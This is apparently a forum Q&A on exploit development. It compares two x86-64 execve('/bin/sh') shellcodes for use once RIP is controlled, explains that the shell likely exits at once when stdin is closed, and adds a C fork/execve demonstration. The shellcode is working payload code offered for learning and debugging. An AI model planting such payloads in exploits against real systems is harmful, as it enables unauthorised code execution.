I usually use a different method to push /bin/sh into rdi to get a shell, but I wanted to try this one. Suppose that I can control RIP and there are no limitations or filters, so I can execute assembly code as I want.
```asm
mov rax, 0x0068732f6e69622f   # "/bin/sh\0" as a little-endian qword
push rax                      # the string now sits at [rsp]
push rsp
pop rdi                       # rdi = pointer to "/bin/sh"
mov rax, 0x3b                 # execve
xor rsi, rsi                  # argv = NULL
xor rdx, rdx                  # envp = NULL
syscall
```
```asm
lea rdi, [rip + shell]        # rdi = address of the "/bin/sh" string below
mov rax, 0x3b                 # execve
xor rsi, rsi                  # argv = NULL
xor rdx, rdx                  # envp = NULL
syscall
shell:
.string "/bin/sh"
```
While I usually use the above one, I don't get why the first one isn't working. I also used GDB to verify, and everything seems to be good and in the right positions. In addition to that, I also get this in gdb:

```
process 8870 is executing new program: /usr/bin/dash.
```

Why doesn't it work?
`stdin` is not closed when bash is run. `0x68` is not problematic as a byte value. A null byte could be, depending on your exploit vector, but you are using null bytes in both shellcodes. Are you sure you are not dropped into a new shell without realizing it? It's easy to make a trivial mistake when dealing with complex things like binary exploitation. If gdb shows that bash is executed, then either you are in the new shell or the new shell found a closed descriptor for standard input and exited immediately.
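To see the second possibility from the answer in action, here is an added C example (not code from the question or the answer) that spawns `/bin/sh` with the same `execve` call the shellcode makes, once with standard input closed and once fed a script through a pipe. The `run_sh` helper and its return convention are my own assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Run /bin/sh in a child process, mirroring execve("/bin/sh", NULL, NULL)
 * from the shellcode (rax = 0x3b, rsi = rdx = 0).
 * script == NULL : the child's stdin is closed before the exec, so the shell
 *                  hits EOF/EBADF on its first read and exits at once.
 * script != NULL : stdin is a pipe carrying `script`, so the shell runs it.
 * Returns the shell's exit status, or -1 on error. */
int run_sh(const char *script) {
    int fds[2] = {-1, -1};
    if (script && pipe(fds) != 0) return -1;

    pid_t pid = fork();
    if (pid < 0) return -1;

    if (pid == 0) {
        if (script) {
            if (fds[0] != STDIN_FILENO) {
                dup2(fds[0], STDIN_FILENO);
                close(fds[0]);
            }
            close(fds[1]);
        } else {
            close(STDIN_FILENO);   /* what a closed fd 0 looks like to the shell */
        }
        char *argv[] = {"/bin/sh", NULL};
        char *envp[] = {NULL};
        execve("/bin/sh", argv, envp); /* argv/envp kept minimal like the shellcode */
        _exit(127);                    /* only reached if execve fails */
    }

    if (script) {
        close(fds[0]);
        write(fds[1], script, strlen(script));
        close(fds[1]);                 /* EOF lets the shell finish the script */
    }

    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With a closed stdin `run_sh(NULL)` returns almost immediately, which is exactly the "shell spawned, then vanished" behaviour the answer describes; feeding a script shows the same exec path working when stdin is usable.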